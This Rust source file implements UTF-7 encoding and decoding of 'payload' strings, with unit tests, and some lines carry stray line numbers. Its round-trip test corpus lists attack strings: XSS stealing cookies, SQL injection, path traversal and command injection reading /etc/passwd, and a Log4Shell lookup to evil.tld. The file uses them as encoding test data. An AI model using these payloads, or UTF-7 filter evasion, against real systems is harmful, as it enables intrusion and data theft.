1use base64::{Engine as _, engine::general_purpose};
15
/// Serialises `c` as UTF-16 code units in big-endian byte order.
///
/// A character that fits in one UTF-16 code unit yields two bytes; a character
/// that needs a surrogate pair yields four, high surrogate first.
fn char_to_utf16be(c: char) -> Vec<u8> {
    let mut scratch = [0u16; 2];
    let units = c.encode_utf16(&mut scratch);

    let mut bytes = Vec::with_capacity(2 * units.len());
    for unit in units.iter() {
        // Most-significant byte first.
        bytes.extend_from_slice(&unit.to_be_bytes());
    }
    bytes
}
27
28fn modified_base64(bytes: &[u8]) -> String {
30 let mut b64 = general_purpose::STANDARD.encode(bytes);
31 b64.retain(|c| c != '=');
32 b64
33}
34
/// Reports whether `ch` is written to UTF-7 output unchanged.
///
/// The accepted set is ASCII letters, ASCII digits and the punctuation
/// `' ( ) , - . / : ?`. Every other character — including space and `+` —
/// is rejected.
fn is_utf7_direct(ch: char) -> bool {
    const DIRECT_PUNCTUATION: &str = "'(),-./:?";
    ch.is_ascii_alphanumeric() || DIRECT_PUNCTUATION.contains(ch)
}
53
54#[must_use]
59pub fn utf7_encode(payload: &str) -> String {
60 let mut out = String::new();
61 let mut shift_buf: Vec<u8> = Vec::new();
62
63 fn flush_shift(out: &mut String, buf: &mut Vec<u8>) {
64 if !buf.is_empty() {
65 out.push('+');
66 out.push_str(&modified_base64(buf));
67 out.push('-');
68 buf.clear();
69 }
70 }
71
72 for ch in payload.chars() {
73 if ch == '+' {
74 flush_shift(&mut out, &mut shift_buf);
75 out.push_str("+-");
76 } else if is_utf7_direct(ch) {
77 flush_shift(&mut out, &mut shift_buf);
78 out.push(ch);
79 } else {
80 shift_buf.extend_from_slice(&char_to_utf16be(ch));
81 }
82 }
83 flush_shift(&mut out, &mut shift_buf);
84 out
85}
86
/// Reports whether `b` belongs to the base64 alphabet used inside a shifted
/// run: ASCII letters, ASCII digits, `+` and `/`. The padding byte `=` is not
/// accepted.
fn is_modified_base64_byte(b: u8) -> bool {
    matches!(b, b'A'..=b'Z' | b'a'..=b'z' | b'0'..=b'9' | b'+' | b'/')
}
93
/// Maps the first byte of a UTF-8 sequence to the sequence length in bytes.
///
/// `0x00..=0x7F` gives 1, `0xC0..=0xDF` gives 2, `0xE0..=0xEF` gives 3, and
/// every remaining value (including `0x80..=0xBF`) gives 4.
fn utf8_lead_len(first: u8) -> usize {
    if first <= 0x7F {
        1
    } else if (0xC0..=0xDF).contains(&first) {
        2
    } else if (0xE0..=0xEF).contains(&first) {
        3
    } else {
        4
    }
}
104
105#[must_use]
113pub fn utf7_decode(s: &str) -> Option<String> {
114 let b = s.as_bytes();
115 let mut out = String::new();
116 let mut i = 0;
117 while i < b.len() {
118 if b[i] == b'+' {
119 if i + 1 < b.len() && b[i + 1] == b'-' {
121 out.push('+');
122 i += 2;
123 continue;
124 }
125 let start = i + 1;
127 let mut j = start;
128 while j < b.len() && is_modified_base64_byte(b[j]) {
129 j += 1;
130 }
131 let mut chunk = s[start..j].to_string();
132 while !chunk.len().is_multiple_of(4) {
133 chunk.push('='); }
135 let raw = general_purpose::STANDARD.decode(chunk.as_bytes()).ok()?;
136 if raw.len() % 2 != 0 {
137 return None; }
139 let units: Vec<u16> = raw
140 .chunks_exact(2)
141 .map(|c| (u16::from(c[0]) << 8) | u16::from(c[1]))
142 .collect();
143 out.push_str(&String::from_utf16(&units).ok()?);
144 i = j;
145 if i < b.len() && b[i] == b'-' {
146 i += 1; }
148 } else {
149 let len = utf8_lead_len(b[i]);
150 if i + len > b.len() {
151 return None;
152 }
153 out.push_str(s.get(i..i + len)?);
154 i += len;
155 }
156 }
157 Some(out)
158}
159
#[cfg(test)]
mod tests {
    use super::{utf7_decode, utf7_encode};

    /// Direct characters pass through, `+` is escaped, non-ASCII is shifted.
    #[test]
    fn utf7_basic_encode() {
        assert_eq!(utf7_encode("Hello"), "Hello");
        assert_eq!(utf7_encode("A+B"), "A+-B");
        assert!(utf7_encode("日本語").starts_with('+'));
    }

    /// Fixed encoded/decoded pairs, checked in both directions where given.
    #[test]
    fn utf7_decode_matches_canonical_vectors() {
        let vectors = [
            ("+ADw-script+AD4-", "<script>"),
            ("+-", "+"),
            ("hello", "hello"),
        ];
        for (wire, plain) in vectors {
            assert_eq!(utf7_decode(wire).as_deref(), Some(plain));
        }
        assert_eq!(utf7_encode("<script>"), "+ADw-script+AD4-");
    }

    /// Every payload must survive an encode followed by a decode unchanged.
    #[test]
    fn utf7_round_trips_attack_corpus_and_unicode() {
        let corpus = [
            "<script>alert(document.cookie)</script>",
            "' OR '1'='1' -- ",
            "1 UNION SELECT password FROM users",
            "../../../../etc/passwd",
            "${jndi:ldap://evil.tld/a}",
            "; cat /etc/passwd",
            "plain ascii",
            "+already+plus+",
            "café ☕ 日本語 😀 surrogate-pair",
            "",
            "=",
            "<>\"'&;|()[]{}",
        ];
        for p in corpus {
            let enc = utf7_encode(p);
            let decoded = utf7_decode(&enc);
            assert_eq!(
                decoded.as_deref(),
                Some(p),
                "UTF-7 round-trip lost bytes for {p:?} via {enc}"
            );
        }
    }
}